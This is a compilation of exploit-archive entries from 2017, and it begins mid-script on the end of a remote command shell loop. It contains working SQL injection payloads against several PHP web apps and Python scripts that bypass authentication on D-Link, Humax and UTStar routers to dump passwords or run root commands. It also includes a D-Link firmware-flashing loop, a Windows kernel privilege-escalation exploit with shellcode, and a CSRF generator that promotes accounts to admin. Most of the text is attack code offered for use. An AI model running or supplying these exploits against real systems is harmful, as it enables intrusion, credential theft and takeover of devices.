if cmd == 'exit':
break
else:
conn.send(cmd + "\n")
receive(conn)
sock.close()
# Exploit Title: XYZ Auto Classifieds v1.0 - SQL Injection
# Date: 2017-09-12
# Exploit Author: 8bitsec
# Vendor Homepage: http://xyzscripts.com/
# Software Link: https://xyzscripts.com/php-scripts/xyz-auto-classifieds/details
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-12
Product & Service Introduction:
===============================
XYZ Auto Classifieds is a simple and robust PHP + MySQL based auto classifieds script with all options required to start your own auto classifieds site like cars.com.
Technical Details & Description:
================================
SQL injection on [view] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: Consumer Review Script v1.0 - SQL Injection
# Date: 2017-09-12
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/product/consumer-review-script/
# Software Link: http://www.phpscriptsmall.com/product/consumer-review-script/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-12
Product & Service Introduction:
===============================
Consumer Review Script
Technical Details & Description:
================================
SQL injection on [idvalue] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/review-details.php?idvalue=9 and sleep(5)
Parameter: idvalue (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: idvalue=90 AND (SELECT 5020 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(5020=5020,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: idvalue=90 AND SLEEP(5)
==================
8bitsec - [https://twitter.com/_8bitsec]
# phpcgi is responsible for processing requests to .php, .asp and .txt pages. Also, it checks whether a user is authorized or not. Nevertheless, if a request is crafted in a proper way, an attacker can easily bypass authorization and execute a script that returns a login and password to a router.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/phpcgi.py
import requests as rq
EQ = "%3d"
IP = "192.168.0.1"
PORT = "80"
def pair(key, value):
return "%0a_POST_" + key + EQ + value
headers_multipart = {
'CONTENT-TYPE' : 'application/x-www-form-urlencoded'
}
url = 'http://{ip}:{port}/getcfg.php'.format(ip=IP, port=PORT)
auth = "%0aAUTHORIZED_GROUP%3d1"
data = "A=A" + pair("SERVICES", "DEVICE.ACCOUNT") + auth
print(rq.get(url, data=data, headers=headers_multipart).text)
# Due to error in hnap protocol implementation we can overflow stack and execute any sh commands under root priviliges.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/hnap.py
import requests as rq
import struct
IP = "192.168.0.1"
PORT = "80"
# Can differ in different version of routers and versions of firmware
# SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01
SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07
def _str(address):
return struct.pack("<I", address) if address > 0 else struct.pack("<i", address)
url = 'http://{ip}:{port}/HNAP1/'.format(ip=IP, port=PORT)
headers_text = {
'SOAPACTION' : 'http://purenetworks.com/HNAP1/Login',
'CONTENT-TYPE' : 'text/html'
}
payload = b"echo 1 > /tmp/hacked;"
print(rq.post(url, data=b"<Action>" + payload + b"A" * (0x400 - len(payload)) + _str(-1) + b"C" * 0x14 + _str(SYSTEM_ADDRESS)[0:3] + b"</Action>", headers=headers_text).text)
# coding: utf-8
# Exploit Title: Humax HG100R-* Authentication Bypass
# Date: 14/09/2017
# Exploit Author: Kivson
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-11435
# The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially
# crafted requests to the management console. The bug is exploitable remotely when the router is configured to
# expose the management console.
# The router is not validating the session token while returning answers for some methods in url '/api'.
# An attacker can use this vulnerability to retrieve sensitive information such
# as private/public IP addresses, SSID names, and passwords.
import sys
import requests
def print_help():
print('Exploit syntax error, Example:')
print('python exploit.py http://192.168.0.1')
def exploit(host):
print(f'Connecting to {host}')
path = '/api'
payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
response = requests.post(host + path, data=payload)
response.raise_for_status()
if 'result' not in response.json() or 'WiFi_Info' not in response.json()['result'] or 'wlan' not in \
response.json()['result']['WiFi_Info']:
print('Error, target may be no exploitable')
return
for wlan in response.json()['result']['WiFi_Info']['wlan']:
print(f'Wifi data found:')
print(f' SSID: {wlan["ssid"]}')
print(f' PWD: {wlan["password"]}')
def main():
if len(sys.argv) < 2:
print_help()
return
host = sys.argv[1]
exploit(host)
if __name__ == '__main__':
main()
# # # # #
# Exploit Title: Contact Manager 1.0 - SQL Injection
# Dork: N/A
# Date: 15.09.2017
# Vendor Homepage: http://savsofteproducts.com/
# Software Link: http://www.contactmanagerscript.com/download/contact_manager_1380185909.zip
# Demo: http://contactmanagerscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Vulnerable Source:
#
# .............
# <a href="login.php?forgot=1">Forgot Password ?</a>
# <?php
# if(isset($_REQUEST["forgot"])){
# if($_REQUEST["forgot"]=="2"){
# $result=mysql_query("select * from co_setting where Email='$_REQUEST[femail]' ");
# $count=mysql_num_rows($result);
# if($count==1)
#
# {
#
# $npass=rand("5556","99999");
#
# $to = $row['femail'];
# $subject = "Password Reset";
# $message = "New Primary Password is: $npass \r\n";
# $headers = "From: $Email";
#
# $npass=md5($npass);
#
# $query="update co_setting set Password='$npass' where Email='$_REQUEST[femail]'";
# mysql_query($query);
# .............
#
# Proof of Concept:
#
# http://localhost/[PATH]/login.php?forgot=2&femail=[SQL]
#
# Etc..
# # # # #
#!/bin/bash
# If you have access to an ethernet port you can upload custom firmware to a device because system recovery service is started and available for a few seconds after restart.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/update.sh
FIRMWARE="firmware.bin"
IP="192.168.0.1"
while true; do
T=$(($RANDOM + ($RANDOM % 2) * 32768))
STATUS=`wget -t 1 --no-cache -T 0.2 -O - http://$IP/?_=$T 2>/dev/null`
if [[ $STATUS == *"<title>Provided by D-Link</title>"* ]]; then
echo "Uploading..."
curl -F "data=@$FIRMWARE" --connect-timeout 99999 -m 99999 --output /dev/null http://$IP/f2.htm
break
elif [[ $STATUS == *"<title>D-LINK</title>"* ]]; then
echo "Rebooting..."
echo -n -e '\x00\x01\x00\x01EXEC REBOOT SYSTEMaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' | timeout 1s nc -u $IP 19541
fi
done
// Netdecision.cpp : Defines the entry point for the console application.
/*
# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys
# Date: 2017.09.17
# Exploit Author: Peter Baris
# Vendor Homepage: www.netmechanica.com
# Software Link: http://www.netmechanica.com/downloads/ //registration required
# Version: 5.8.2
# Tested on: Windows 7 Pro SP1 x86 / Windows 7 Enterprise SP1
# CVE : CVE-2017-14311
Vendor notified on 2017.09.11 - no response */
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#include <tlhelp32.h>
#include <Psapi.h>
#define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0"
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;
hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);
return hFile;
}
extern ULONG ZwYieldExecution = NULL;
extern PVOID KernelBaseAddressInKernelMode = NULL;
extern HMODULE hKernelInUserMode = NULL;
VOID GetKiFastSystemCall() {
SIZE_T ReturnLength;
HMODULE hntdll = NULL;
ULONG ZwYieldExecution_offset;
hntdll = LoadLibraryA("ntdll.dll");
if (!hntdll) {
printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
LPVOID drivers[1024];
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
KernelBaseAddressInKernelMode = drivers[0];
printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode);
hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe");
if (!hKernelInUserMode) {
printf("[-] Failed to load kernel: 0x%X\n", GetLastError());
exit;
}
printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode);
ZwYieldExecution = GetProcAddress(hKernelInUserMode, "ZwYieldExecution");
if (!ZwYieldExecution) {
printf("[-] Failed to resolve KiFastSystemCall: 0x%X\n", GetLastError());
exit;
}
ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode;
printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset);
(ULONG)ZwYieldExecution = (ULONG)ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode;
printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution);
if (hntdll) {
FreeLibrary(hntdll);
}
if (hKernelInUserMode) {
FreeLibrary(hKernelInUserMode);
}
hntdll = NULL;
return hKernelInUserMode;
return ZwYieldExecution;
}
extern ULONG eip = NULL;
extern ULONG pesp = NULL;
extern ULONG pebp = NULL;
extern ULONG ETHREAD = NULL;
ULONG Shellcode() {
ULONG FunctionAddress = ZwYieldExecution;
__asm {
pushad
pushfd
xor eax,eax
mov edi, FunctionAddress ; Address of ZwYieldExection to EDI
SearchCall:
mov eax, 0xe8
scasb
jnz SearchCall
mov ebx, edi
mov ecx, [edi]
add ebx, ecx; EBX points to KiSystemService
add ebx, 0x4
lea edi, [ebx - 0x1]
SearchFastCallEntry:
mov eax, 0x00000023
scasd
jnz SearchFastCallEntry
mov eax, 0xa10f306a
scasd
jnz SearchFastCallEntry
lea eax,[edi-0x9]
xor edx, edx
mov ecx, 0x176
wrmsr
popfd
popad
mov eax,ETHREAD
mov eax,[eax]
mov eax, [eax+0x050]
mov ecx, eax
mov edx, 0x4
FindSystemProcess :
mov eax, [eax + 0x0B8]
sub eax, 0x0B8
cmp[eax + 0x0B4], edx
jne FindSystemProcess
mov edx, [eax + 0x0F8]
mov[ecx + 0x0F8], edx
;xor eax, eax
mov esp,pesp
mov ebp,pebp
push eip
; int 3
ret
}
}
int main()
{
HANDLE hlib = NULL;
HANDLE hFile = NULL;
PVOID lpInBuffer = NULL;
ULONG lpOutBuffer = NULL;
ULONG lpBytesReturned;
PVOID BuffAddress = NULL;
SIZE_T BufferSize = 0x1000;
SIZE_T nOutBufferSize = 0x800;
ULONG Interval = 0;
ULONG Shell = &Shellcode;
NTSTATUS NtStatus = NULL;
/* Undocumented feature to trigger the vulnerability */
hlib = LoadLibraryA("ntdll.dll");
if (!hlib) {
printf("[-] Failed to load the library: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
GetKiFastSystemCall();
/* Allocate memory for our input and output buffers */
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
/*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/
lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer);
/* Crafting the input buffer */
BuffAddress = (PVOID)(((ULONG)lpInBuffer));
*(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4));
*(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8));
*(PULONG)BuffAddress = (ULONG)0x00000000; /* EDX is 0x00000000 in 32bit mode */
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc));
*(PULONG)BuffAddress = (ULONG)0x00000000;
//RtlFillMemory(lpInBuffer, BufferSize, 0x41);
//RtlFillMemory(lpOutBuffer, BufferSize, 0x42);
//printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n");
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError());
return 1;
}
else
{
printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n");
}
/*Here we calculate the EIP for our return from kernel-mode. This exploit does not let us simply adjust the stack and return*/
(HANDLE)eip = GetModuleHandleA(NULL); /*Getting the base address of our process*/
printf("[+] Current process base address 0x%X\r\n", (HANDLE)eip);
(HANDLE)eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instrction*/
printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", (HANDLE)eip);
/*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/
DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/
ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i);
printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i);
if (affinity == NULL) {
printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError());
exit(1);
}
ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/
/*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */
__asm {
mov pesp, esp
mov pebp, ebp
nop
}
DeviceIoControl(hFile,
0x9C402088,
lpInBuffer,
0x10,
lpOutBuffer,
0x20,
&lpBytesReturned,
NULL);
STARTUPINFO info = { sizeof(info) };
PROCESS_INFORMATION processInfo;
NTSTATUS proc;
LPCSTR command = L"C:\\Windows\\System32\\cmd.exe";
proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo);
if (!proc) {
printf("ERROR 0x%X\r\n", proc);
}
WaitForSingleObject(processInfo.hProcess, INFINITE);
exit(0);
}
# # # # #
# Exploit Title: PTCEvolution 5.50 - SQL Injection
# Dork: N/A
# Date: 15.09.2017
# Vendor Homepage: http://ptcevolution.com/
# Software Link: http://www.ptcevolution.com/demoo/
# Demo: http://demo.ptcevolution.com/
# Version: 5.50
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?view=product&id=[SQL]
# http://localhost/[PATH]/index.php?view=products&id=[SQL]
#
# -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
#
# Etc..
# # # # #
#!/usr/local/bin/python
# # # # #
# Exploit Title: Digirez 3.4 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/index.asp
# Demo: http://www.digiappz.com/room/index.asp
# Version: 3.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
Digirez 3.4 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/room: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8565): ")
csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user" >
<table align=center border=0>
<tr>
<td valign="middle">
<table align=center border=0>
<tr>
<td align=center bgcolor="white">
<table border=0 width=400 cellpadding=2 cellspacing=1>
<tr>
<td align=left colspan=2 bgcolor="cream">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td width=150>
<font>Choose Login*</font>
</td>
<td>
<INPUT type="text" name="login" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Choose Password*</font>
</td>
<td>
<INPUT type="text" name="password" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>First Name*</font>
</td>
<td>
<INPUT type="text" name="first_name" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Last Name*</font>
</td>
<td>
<INPUT type="text" name="last_name" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Email*</font>
</td>
<td>
<INPUT type="text" name="email" size="30"value="admin@admin.com" onBlur="emailvalid(this);">
</td>
</tr>
<tr>
<td>
<font>Address 1</font>
</td>
<td>
<INPUT type="text" name="address1" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Address 2</font>
</td>
<td>
<INPUT type="text" name="address2" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>City / Town</font>
</td>
<td>
<INPUT type="text" name="city" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>ZIP / Postcode</font>
</td>
<td>
<INPUT type="text" name="postcode" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>State / County</font>
</td>
<td>
<INPUT type="text" name="county" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Country</font>
</td>
<td>
<select name="country">
<option value="1" selected> Turkey
</select>
</td>
</tr>
<tr>
<td>
<font>Phone Number
<td>
<INPUT type="text" name="phone" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Fax</font>
</td>
<td>
<INPUT type="text" name="fax" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Status</font>
</td>
<td>
<select name="status">
<option value="1"> User</option>
<option value="2" selected> Admin</option>
</select>
</td>
</tr>
<tr>
<td colspan=2 align=center>
<input type="hidden" name="id" value="%s">
<input type="submit" value="Update" onclick="return check()">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()
# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability
# CVE: CVE-2017-14243
# Date: 15-09-2017
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem
# Firmware version: WA3002G4-0021.01
# Vendor Homepage: http://www.utstar.com/
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
Vulnerability Details
======================
The CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source.
How to reproduce
===================
Suppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi
Example URLs:
* http://192.168.1.1/info.cgi – Status and details
* http://192.168.1.1/upload.cgi – Firmware Upgrade
* http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
* http://192.168.1.1/pppoe.cgi – PPPoE settings
* http://192.168.1.1/resetrouter.cgi – Router reset
* http://192.168.1.1/password.cgi – password settings
POC
=========
* https://www.youtube.com/watch?v=-wh1Y_jXMGk
-----------------------Greetz----------------------
++++++++++++++++++ www.0seccon.com ++++++++++++++++++
Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel